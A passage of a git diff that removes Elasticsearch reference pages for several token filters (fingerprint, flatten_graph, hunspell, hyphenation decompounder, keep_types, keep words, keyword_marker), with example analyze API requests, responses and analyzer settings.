a/docs/reference/analysis/tokenfilters/fingerprint-tokenfilter.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[[analysis-fingerprint-tokenfilter]] -=== Fingerprint token filter -++++ -Fingerprint -++++ - -Sorts and removes duplicate tokens from a token stream, then concatenates the -stream into a single output token. - -For example, this filter changes the `[ the, fox, was, very, very, quick ]` -token stream as follows: - -. Sorts the tokens alphabetically to `[ fox, quick, the, very, very, was ]` - -. Removes a duplicate instance of the `very` token. - -. Concatenates the token stream to a output single token: `[fox quick the very was ]` - -Output tokens produced by this filter are useful for -fingerprinting and clustering a body of text as described in the -https://github.com/OpenRefine/OpenRefine/wiki/Clustering-In-Depth#fingerprint[OpenRefine -project]. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/FingerprintFilter.html[FingerprintFilter]. - -[[analysis-fingerprint-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `fingerprint` -filter to create a single output token for the text `zebra jumps over resting -resting dog`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "whitespace", - "filter" : ["fingerprint"], - "text" : "zebra jumps over resting resting dog" -} --------------------------------------------------- - -The filter produces the following token: - -[source,text] --------------------------------------------------- -[ dog jumps over resting zebra ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "dog jumps over resting zebra", - "start_offset" : 0, - "end_offset" : 36, - "type" : "fingerprint", - "position" : 0 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-fingerprint-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`fingerprint` filter to configure a new <>. - -[source,console] --------------------------------------------------- -PUT fingerprint_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_fingerprint": { - "tokenizer": "whitespace", - "filter": [ "fingerprint" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-fingerprint-tokenfilter-configure-parms]] -==== Configurable parameters - -[[analysis-fingerprint-tokenfilter-max-size]] -`max_output_size`:: -(Optional, integer) -Maximum character length, including whitespace, of the output token. Defaults to -`255`. Concatenated tokens longer than this will result in no token output. - -`separator`:: -(Optional, string) -Character to use to concatenate the token stream input. Defaults to a space. - -[[analysis-fingerprint-tokenfilter-customize]] -==== Customize - -To customize the `fingerprint` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `fingerprint` filter with -that use `+` to concatenate token streams. The filter also limits -output tokens to `100` characters or fewer. - -[source,console] --------------------------------------------------- -PUT custom_fingerprint_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_": { - "tokenizer": "whitespace", - "filter": [ "fingerprint_plus_concat" ] - } - }, - "filter": { - "fingerprint_plus_concat": { - "type": "fingerprint", - "max_output_size": 100, - "separator": "+" - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/flatten-graph-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/flatten-graph-tokenfilter.asciidoc deleted file mode 100644 index b719ea376a2..00000000000 --- a/docs/reference/analysis/tokenfilters/flatten-graph-tokenfilter.asciidoc +++ /dev/null @@ -1,227 +0,0 @@ -[[analysis-flatten-graph-tokenfilter]] -=== Flatten graph token filter -++++ -Flatten graph -++++ - -Flattens a <> produced by a graph token filter, such -as <> or -<>. - -Flattening a token graph containing -<> makes the graph -suitable for <>. Otherwise, indexing does -not support token graphs containing multi-position tokens. - -[WARNING] -==== -Flattening graphs is a lossy process. - -If possible, avoid using the `flatten_graph` filter. Instead, use graph token -filters in <> only. This eliminates -the need for the `flatten_graph` filter. -==== - -The `flatten_graph` filter uses Lucene's -{lucene-analysis-docs}/core/FlattenGraphFilter.html[FlattenGraphFilter]. - -[[analysis-flatten-graph-tokenfilter-analyze-ex]] -==== Example - -To see how the `flatten_graph` filter works, you first need to produce a token -graph containing multi-position tokens. - -The following <> request uses the `synonym_graph` -filter to add `dns` as a multi-position synonym for `domain name system` in the -text `domain name system is fragile`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "synonym_graph", - "synonyms": [ "dns, domain name system" ] - } - ], - "text": "domain name system is fragile" -} ----- - -The filter produces the following token graph with `dns` as a multi-position -token. - -image::images/analysis/token-graph-dns-synonym-ex.svg[align="center"] - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "dns", - "start_offset": 0, - "end_offset": 18, - "type": "SYNONYM", - "position": 0, - "positionLength": 3 - }, - { - "token": "domain", - "start_offset": 0, - "end_offset": 6, - "type": "", - "position": 0 - }, - { - "token": "name", - "start_offset": 7, - "end_offset": 11, - "type": "", - "position": 1 - }, - { - "token": "system", - "start_offset": 12, - "end_offset": 18, - "type": "", - "position": 2 - }, - { - "token": "is", - "start_offset": 19, - "end_offset": 21, - "type": "", - "position": 3 - }, - { - "token": "fragile", - "start_offset": 22, - "end_offset": 29, - "type": "", - "position": 4 - } - ] -} ----- -//// - -Indexing does not support token graphs containing multi-position tokens. To make -this token graph suitable for indexing, it needs to be flattened. - -To flatten the token graph, add the `flatten_graph` filter after the -`synonym_graph` filter in the previous analyze API request. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "synonym_graph", - "synonyms": [ "dns, domain name system" ] - }, - "flatten_graph" - ], - "text": "domain name system is fragile" -} ----- - -The filter produces the following flattened token graph, which is suitable for -indexing. - -image::images/analysis/token-graph-dns-invalid-ex.svg[align="center"] - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "dns", - "start_offset": 0, - "end_offset": 18, - "type": "SYNONYM", - "position": 0, - "positionLength": 3 - }, - { - "token": "domain", - "start_offset": 0, - "end_offset": 6, - "type": "", - "position": 0 - }, - { - "token": "name", - "start_offset": 7, - "end_offset": 11, - "type": "", - "position": 1 - }, - { - "token": "system", - "start_offset": 12, - "end_offset": 18, - "type": "", - "position": 2 - }, - { - "token": "is", - "start_offset": 19, - "end_offset": 21, - "type": "", - "position": 3 - }, - { - "token": "fragile", - "start_offset": 22, - "end_offset": 29, - "type": "", - "position": 4 - } - ] -} ----- -//// - -[[analysis-keyword-marker-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`flatten_graph` token filter to configure a new -<>. - -In this analyzer, a custom `word_delimiter_graph` filter produces token graphs -containing catenated, multi-position tokens. The `flatten_graph` filter flattens -these token graphs, making them suitable for indexing. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_index_analyzer": { - "type": "custom", - "tokenizer": "standard", - "filter": [ - "my_custom_word_delimiter_graph_filter", - "flatten_graph" - ] - } - }, - "filter": { - "my_custom_word_delimiter_graph_filter": { - "type": "word_delimiter_graph", - "catenate_all": true - } - } - } - } -} ----- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/hunspell-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/hunspell-tokenfilter.asciidoc deleted file mode 100644 index 068ee36877f..00000000000 --- a/docs/reference/analysis/tokenfilters/hunspell-tokenfilter.asciidoc +++ /dev/null @@ -1,247 +0,0 @@ -[[analysis-hunspell-tokenfilter]] -=== Hunspell token filter -++++ -Hunspell -++++ - -Provides <> based on a provided -{wikipedia}/Hunspell[Hunspell dictionary]. The `hunspell` -filter requires -<> of one or more -language-specific Hunspell dictionaries. - -This filter uses Lucene's -{lucene-analysis-docs}/hunspell/HunspellStemFilter.html[HunspellStemFilter]. - -[TIP] -==== -If available, we recommend trying an algorithmic stemmer for your language -before using the <> token filter. -In practice, algorithmic stemmers typically outperform dictionary stemmers. -See <>. -==== - -[[analysis-hunspell-tokenfilter-dictionary-config]] -==== Configure Hunspell dictionaries - -By default, Hunspell dictionaries are stored and detected on a dedicated -hunspell directory on the filesystem: `/hunspell`. Each dictionary -is expected to have its own directory, named after its associated language and -locale (e.g., `pt_BR`, `en_GB`). This dictionary directory is expected to hold a -single `.aff` and one or more `.dic` files, all of which will automatically be -picked up. For example, assuming the default `/hunspell` path -is used, the following directory layout will define the `en_US` dictionary: - -[source,txt] --------------------------------------------------- -- config - |-- hunspell - | |-- en_US - | | |-- en_US.dic - | | |-- en_US.aff --------------------------------------------------- - -Each dictionary can be configured with one setting: - -[[analysis-hunspell-ignore-case-settings]] -`ignore_case`:: -(Static, Boolean) -If true, dictionary matching will be case insensitive. Defaults to `false`. - -This setting can be configured globally in `elasticsearch.yml` using -`indices.analysis.hunspell.dictionary.ignore_case`. - -To configure the setting for a specific locale, use the -`indices.analysis.hunspell.dictionary..ignore_case` setting (e.g., for -the `en_US` (American English) locale, the setting is -`indices.analysis.hunspell.dictionary.en_US.ignore_case`). - -It is also possible to add `settings.yml` file under the dictionary -directory which holds these settings. This overrides any other `ignore_case` -settings defined in `elasticsearch.yml`. - -[[analysis-hunspell-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `hunspell` filter to stem -`the foxes jumping quickly` to `the fox jump quick`. - -The request specifies the `en_US` locale, meaning that the -`.aff` and `.dic` files in the `/hunspell/en_US` directory are used -for the Hunspell dictionary. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "hunspell", - "locale": "en_US" - } - ], - "text": "the foxes jumping quickly" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ the, fox, jump, quick ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 4, - "end_offset": 9, - "type": "", - "position": 1 - }, - { - "token": "jump", - "start_offset": 10, - "end_offset": 17, - "type": "", - "position": 2 - }, - { - "token": "quick", - "start_offset": 18, - "end_offset": 25, - "type": "", - "position": 3 - } - ] -} ----- -//// - -[[analysis-hunspell-tokenfilter-configure-parms]] -==== Configurable parameters - -[[analysis-hunspell-tokenfilter-dictionary-param]] -`dictionary`:: -(Optional, string or array of strings) -One or more `.dic` files (e.g, `en_US.dic, my_custom.dic`) to use for the -Hunspell dictionary. -+ -By default, the `hunspell` filter uses all `.dic` files in the -`/hunspell/` directory specified specified using the -`lang`, `language`, or `locale` parameter. To use another directory, the -directory's path must be registered using the -<> setting. - -`dedup`:: -(Optional, Boolean) -If `true`, duplicate tokens are removed from the filter's output. Defaults to -`true`. - -`lang`:: -(Required*, string) -An alias for the <>. -+ -If this parameter is not specified, the `language` or `locale` parameter is -required. - -`language`:: -(Required*, string) -An alias for the <>. -+ -If this parameter is not specified, the `lang` or `locale` parameter is -required. - -[[analysis-hunspell-tokenfilter-locale-param]] -`locale`:: -(Required*, string) -Locale directory used to specify the `.aff` and `.dic` files for a Hunspell -dictionary. See <>. -+ -If this parameter is not specified, the `lang` or `language` parameter is -required. - -`longest_only`:: -(Optional, Boolean) -If `true`, only the longest stemmed version of each token is -included in the output. If `false`, all stemmed versions of the token are -included. Defaults to `false`. - -[[analysis-hunspell-tokenfilter-analyzer-ex]] -==== Customize and add to an analyzer - -To customize the `hunspell` filter, duplicate it to create the -basis for a new custom token filter. You can modify the filter using its -configurable parameters. - -For example, the following <> request -uses a custom `hunspell` filter, `my_en_US_dict_stemmer`, to configure a new -<>. - -The `my_en_US_dict_stemmer` filter uses a `locale` of `en_US`, meaning that the -`.aff` and `.dic` files in the `/hunspell/en_US` directory are -used. The filter also includes a `dedup` argument of `false`, meaning that -duplicate tokens added from the dictionary are not removed from the filter's -output. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "en": { - "tokenizer": "standard", - "filter": [ "my_en_US_dict_stemmer" ] - } - }, - "filter": { - "my_en_US_dict_stemmer": { - "type": "hunspell", - "locale": "en_US", - "dedup": false - } - } - } - } -} ----- - -[[analysis-hunspell-tokenfilter-settings]] -==== Settings - -In addition to the <>, you can configure the following global settings for the `hunspell` -filter using `elasticsearch.yml`: - -`indices.analysis.hunspell.dictionary.lazy`:: -(Static, Boolean) -If `true`, the loading of Hunspell dictionaries is deferred until a dictionary -is used. If `false`, the dictionary directory is checked for dictionaries when -the node starts, and any dictionaries are automatically loaded. Defaults to -`false`. - -[[indices-analysis-hunspell-dictionary-location]] -`indices.analysis.hunspell.dictionary.location`:: -(Static, string) -Path to a Hunspell dictionary directory. This path must be absolute or -relative to the `config` location. -+ -By default, the `/hunspell` directory is used, as described in -<>. diff --git a/docs/reference/analysis/tokenfilters/hyphenation-decompounder-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/hyphenation-decompounder-tokenfilter.asciidoc deleted file mode 100644 index eed66d81e91..00000000000 --- a/docs/reference/analysis/tokenfilters/hyphenation-decompounder-tokenfilter.asciidoc +++ /dev/null @@ -1,154 +0,0 @@ -[[analysis-hyp-decomp-tokenfilter]] -=== Hyphenation decompounder token filter -++++ -Hyphenation decompounder -++++ - -Uses XML-based hyphenation patterns to find potential subwords in compound -words. These subwords are then checked against the specified word list. Subwords not -in the list are excluded from the token output. - -This filter uses Lucene's -{lucene-analysis-docs}/compound/HyphenationCompoundWordTokenFilter.html[HyphenationCompoundWordTokenFilter], -which was built for Germanic languages. - -[[analysis-hyp-decomp-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`hyphenation_decompounder` filter to find subwords in `Kaffeetasse` based on -German hyphenation patterns in the `analysis/hyphenation_patterns.xml` file. The -filter then checks these subwords against a list of specified words: `kaffee`, -`zucker`, and `tasse`. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "hyphenation_decompounder", - "hyphenation_patterns_path": "analysis/hyphenation_patterns.xml", - "word_list": ["Kaffee", "zucker", "tasse"] - } - ], - "text": "Kaffeetasse" -} --------------------------------------------------- -// TEST[skip: requires a valid hyphenation_patterns.xml file for DE-DR] - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ Kaffeetasse, Kaffee, tasse ] --------------------------------------------------- - -[[analysis-hyp-decomp-tokenfilter-configure-parms]] -==== Configurable parameters - -`hyphenation_patterns_path`:: -+ --- -(Required, string) -Path to an Apache FOP (Formatting Objects Processor) XML hyphenation pattern file. - -This path must be absolute or relative to the `config` location. Only FOP v1.2 -compatible files are supported. - -For example FOP XML hyphenation pattern files, refer to: - -* http://offo.sourceforge.net/#FOP+XML+Hyphenation+Patterns[Objects For Formatting Objects (OFFO) Sourceforge project] -* https://sourceforge.net/projects/offo/files/offo-hyphenation/1.2/offo-hyphenation_v1.2.zip/download[offo-hyphenation_v1.2.zip direct download] (v2.0 and above hyphenation pattern files are not supported) --- - -`word_list`:: -+ --- -(Required+++*+++, array of strings) -A list of subwords. Subwords found using the hyphenation pattern but not in this -list are excluded from the token output. - -You can use the <> -filter to test the quality of word lists before implementing them. - -Either this parameter or `word_list_path` must be specified. --- - -`word_list_path`:: -+ --- -(Required+++*+++, string) -Path to a file containing a list of subwords. Subwords found using the -hyphenation pattern but not in this list are excluded from the token output. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each token in the file must be separated by a line break. - -You can use the <> -filter to test the quality of word lists before implementing them. - -Either this parameter or `word_list` must be specified. --- - -`max_subword_size`:: -(Optional, integer) -Maximum subword character length. Longer subword tokens are excluded from the -output. Defaults to `15`. - -`min_subword_size`:: -(Optional, integer) -Minimum subword character length. Shorter subword tokens are excluded from the -output. Defaults to `2`. - -`min_word_size`:: -(Optional, integer) -Minimum word character length. Shorter word tokens are excluded from the -output. Defaults to `5`. - -`only_longest_match`:: -(Optional, Boolean) -If `true`, only include the longest matching subword. Defaults to `false`. - -[[analysis-hyp-decomp-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `hyphenation_decompounder` filter, duplicate it to create the -basis for a new custom token filter. You can modify the filter using its -configurable parameters. - -For example, the following <> request -uses a custom `hyphenation_decompounder` filter to configure a new -<>. - -The custom `hyphenation_decompounder` filter find subwords based on hyphenation -patterns in the `analysis/hyphenation_patterns.xml` file. The filter then checks -these subwords against the list of words specified in the -`analysis/example_word_list.txt` file. Subwords longer than 22 characters are -excluded from the token output. - -[source,console] --------------------------------------------------- -PUT hyphenation_decompound_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_hyphenation_decompound": { - "tokenizer": "standard", - "filter": [ "22_char_hyphenation_decompound" ] - } - }, - "filter": { - "22_char_hyphenation_decompound": { - "type": "hyphenation_decompounder", - "word_list_path": "analysis/example_word_list.txt", - "hyphenation_patterns_path": "analysis/hyphenation_patterns.xml", - "max_subword_size": 22 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/keep-types-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/keep-types-tokenfilter.asciidoc deleted file mode 100644 index 9fca0275e80..00000000000 --- a/docs/reference/analysis/tokenfilters/keep-types-tokenfilter.asciidoc +++ /dev/null @@ -1,202 +0,0 @@ -[[analysis-keep-types-tokenfilter]] -=== Keep types token filter -++++ -Keep types -++++ - -Keeps or removes tokens of a specific type. For example, you can use this filter -to change `3 quick foxes` to `quick foxes` by keeping only `` -(alphanumeric) tokens. - -[NOTE] -.Token types -==== -Token types are set by the <> when converting -characters to tokens. Token types can vary between tokenizers. - -For example, the <> tokenizer can -produce a variety of token types, including ``, ``, and -``. Simpler analyzers, like the -<> tokenizer, only produce the `word` -token type. - -Certain token filters can also add token types. For example, the -<> filter can add the `` token -type. -==== - -This filter uses Lucene's -{lucene-analysis-docs}/core/TypeTokenFilter.html[TypeTokenFilter]. - -[[analysis-keep-types-tokenfilter-analyze-include-ex]] -==== Include example - -The following <> request uses the `keep_types` -filter to keep only `` (numeric) tokens from `1 quick fox 2 lazy dogs`. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "keep_types", - "types": [ "" ] - } - ], - "text": "1 quick fox 2 lazy dogs" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ 1, 2 ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "1", - "start_offset": 0, - "end_offset": 1, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 12, - "end_offset": 13, - "type": "", - "position": 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-keep-types-tokenfilter-analyze-exclude-ex]] -==== Exclude example - -The following <> request uses the `keep_types` -filter to remove `` tokens from `1 quick fox 2 lazy dogs`. Note the `mode` -parameter is set to `exclude`. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "keep_types", - "types": [ "" ], - "mode": "exclude" - } - ], - "text": "1 quick fox 2 lazy dogs" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ quick, fox, lazy, dogs ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 2, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "fox", - "start_offset": 8, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "lazy", - "start_offset": 14, - "end_offset": 18, - "type": "", - "position": 4 - }, - { - "token": "dogs", - "start_offset": 19, - "end_offset": 23, - "type": "", - "position": 5 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-keep-types-tokenfilter-configure-parms]] -==== Configurable parameters - -`types`:: -(Required, array of strings) -List of token types to keep or remove. - -`mode`:: -(Optional, string) -Indicates whether to keep or remove the specified token types. -Valid values are: - -`include`::: -(Default) Keep only the specified token types. - -`exclude`::: -Remove the specified token types. - -[[analysis-keep-types-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `keep_types` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `keep_types` filter to configure a new -<>. The custom `keep_types` filter -keeps only `` (alphanumeric) tokens. - -[source,console] --------------------------------------------------- -PUT keep_types_example -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "extract_alpha" ] - } - }, - "filter": { - "extract_alpha": { - "type": "keep_types", - "types": [ "" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/keep-words-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/keep-words-tokenfilter.asciidoc deleted file mode 100644 index a0a9c08bf99..00000000000 --- a/docs/reference/analysis/tokenfilters/keep-words-tokenfilter.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[analysis-keep-words-tokenfilter]] -=== Keep words token filter -++++ -Keep words -++++ - -Keeps only tokens contained in a specified word list. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/KeepWordFilter.html[KeepWordFilter]. - -[NOTE] -==== -To remove a list of words from a token stream, use the -<> filter. -==== - -[[analysis-keep-words-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `keep` filter to -keep only the `fox` and `dog` tokens from -`the quick fox jumps over the lazy dog`. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "keep", - "keep_words": [ "dog", "elephant", "fox" ] - } - ], - "text": "the quick fox jumps over the lazy dog" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ fox, dog ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "fox", - "start_offset": 10, - "end_offset": 13, - "type": "word", - "position": 2 - }, - { - "token": "dog", - "start_offset": 34, - "end_offset": 37, - "type": "word", - "position": 7 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-keep-words-tokenfilter-configure-parms]] -==== Configurable parameters - -`keep_words`:: -+ --- -(Required+++*+++, array of strings) -List of words to keep. Only tokens that match words in this list are included in -the output. - -Either this parameter or `keep_words_path` must be specified. --- - -`keep_words_path`:: -+ --- -(Required+++*+++, array of strings) -Path to a file that contains a list of words to keep. Only tokens that match -words in this list are included in the output. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each word in the file must be separated by a line break. - -Either this parameter or `keep_words` must be specified. --- - -`keep_words_case`:: -(Optional, Boolean) -If `true`, lowercase all keep words. Defaults to `false`. - -[[analysis-keep-words-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `keep` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses custom `keep` filters to configure two new -<>: - -* `standard_keep_word_array`, which uses a custom `keep` filter with an inline - array of keep words -* `standard_keep_word_file`, which uses a customer `keep` filter with a keep - words file - -[source,console] --------------------------------------------------- -PUT keep_words_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_keep_word_array": { - "tokenizer": "standard", - "filter": [ "keep_word_array" ] - }, - "standard_keep_word_file": { - "tokenizer": "standard", - "filter": [ "keep_word_file" ] - } - }, - "filter": { - "keep_word_array": { - "type": "keep", - "keep_words": [ "one", "two", "three" ] - }, - "keep_word_file": { - "type": "keep", - "keep_words_path": "analysis/example_word_list.txt" - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/keyword-marker-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/keyword-marker-tokenfilter.asciidoc deleted file mode 100644 index aab546326a9..00000000000 --- a/docs/reference/analysis/tokenfilters/keyword-marker-tokenfilter.asciidoc +++ /dev/null @@ -1,389 +0,0 @@ -[[analysis-keyword-marker-tokenfilter]] -=== Keyword marker token filter -++++ -Keyword marker -++++ - -Marks specified tokens as keywords, which are not stemmed. - -The `keyword_marker` filter assigns specified tokens a `keyword` attribute of -`true`. Stemmer token filters, such as -<> or -<>, skip tokens with a `keyword` -attribute of `true`. - -[IMPORTANT] -==== -To work properly, the `keyword_marker` filter must be listed before any stemmer -token filters in the <>. -==== - -The `keyword_marker` filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/KeywordMarkerFilter.html[KeywordMarkerFilter]. - -[[analysis-keyword-marker-tokenfilter-analyze-ex]] -==== Example - -To see how the `keyword_marker` filter works, you first need to produce a token -stream containing stemmed tokens. - -The following <> request uses the -<> filter to create stemmed tokens for -`fox running and jumping`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ "stemmer" ], - "text": "fox running and jumping" -} ----- - -The request produces the following tokens. Note that `running` was stemmed to -`run` and `jumping` was stemmed to `jump`. - -[source,text] ----- -[ fox, run, and, jump ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "jump", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -To prevent `jumping` from being stemmed, add the `keyword_marker` filter before -the `stemmer` filter in the previous analyze API request. Specify `jumping` in -the `keywords` parameter of the `keyword_marker` filter. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "keyword_marker", - "keywords": [ "jumping" ] - }, - "stemmer" - ], - "text": "fox running and jumping" -} ----- - -The request produces the following tokens. `running` is still stemmed to `run`, -but `jumping` is not stemmed. - -[source,text] ----- -[ fox, run, and, jumping ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -To see the `keyword` attribute for these tokens, add the following arguments to -the analyze API request: - -* `explain`: `true` -* `attributes`: `keyword` - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "keyword_marker", - "keywords": [ "jumping" ] - }, - "stemmer" - ], - "text": "fox running and jumping", - "explain": true, - "attributes": "keyword" -} ----- - -The API returns the following response. Note the `jumping` token has a -`keyword` attribute of `true`. - -[source,console-result] ----- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": { - "name": "whitespace", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3 - } - ] - }, - "tokenfilters": [ - { - "name": "__anonymous__keyword_marker", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": false - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": false - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - } - ] - }, - { - "name": "stemmer", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": false - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": false - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - } - ] - } - ] - } -} ----- - -[[analysis-keyword-marker-tokenfilter-configure-parms]] -==== Configurable parameters - -`ignore_case`:: -(Optional, Boolean) -If `true`, matching for the `keywords` and `keywords_path` parameters ignores -letter case. Defaults to `false`. - -`keywords`:: -(Required*, array of strings) -Array of keywords. Tokens that match these keywords are not stemmed. -+ -This parameter, `keywords_path`, or `keywords_pattern` must be specified. -You cannot specify this parameter and `keywords_pattern`. - -`keywords_path`:: -+ --- -(Required*, string) -Path to a file that contains a list of keywords. Tokens that match these -keywords are not stemmed. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each word in the file must be separated by a line break. - -This parameter, `keywords`, or `keywords_pattern` must be specified. -You cannot specify this parameter and `keywords_pattern`. --- - -`keywords_pattern`:: -+ --- -(Required*, string) -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java -regular expression] used to match tokens. Tokens that match this expression are -marked as keywords and not stemmed. - -This parameter, `keywords`, or `keywords_path` must be specified. You -cannot specify this parameter and `keywords` or `keywords_pattern`. - -[WARNING] -==== -Poorly written regular expressions can cause {es} to run slowly or result -in stack overflow errors, causing the running node to suddenly exit. -==== --- - -[[analysis-keyword-marker-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `keyword_marker` filter, duplicate it to create the basis for a -new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `keyword_marker` filter and the `porter_stem` -filter to configure a new <>. - -The custom `keyword_marker` filter marks tokens specified in the -`analysis/example_word_list.txt` file as keywords. The `porter_stem` filter does -not stem these tokens. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "type": "custom", - "tokenizer": "standard", - "filter": [ - "my_custom_keyword_marker_filter", - "porter_stem" - ] - } - }, - "filter": { - "my_custom_keyword_marker_filter": { - "type": "keyword_marker", - "keywords_path": "analysis/example_word_list.txt" - } - } - } - } -} ----- diff --git 